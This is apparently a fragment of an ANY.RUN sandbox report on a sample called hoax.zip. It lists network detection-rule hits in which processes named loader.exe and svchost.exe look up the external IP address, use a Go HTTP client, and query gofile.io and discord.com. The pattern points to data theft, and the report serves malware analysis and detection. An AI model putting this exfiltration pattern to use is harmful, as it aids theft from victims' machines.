ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI
2196
svchost.exe
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Check (ip-api .com)
2196
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
8028
loader.exe
Misc activity
ET INFO Go-http-client User-Agent Observed Outbound
8028
loader.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup ip-api.com
8028
loader.exe
Misc activity
ET USER_AGENTS Go HTTP Client User-Agent
2196
svchost.exe
Potentially Bad Traffic
ET FILE_SHARING Online File Storage Domain in DNS Lookup (gofile .io)
2196
svchost.exe
Misc activity
ET INFO Observed Discord Domain in DNS Lookup (discord .com)
2196
svchost.exe
Misc activity
ET INFO Discord Chat Service Domain in DNS Lookup (discord .com)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
hoax.zip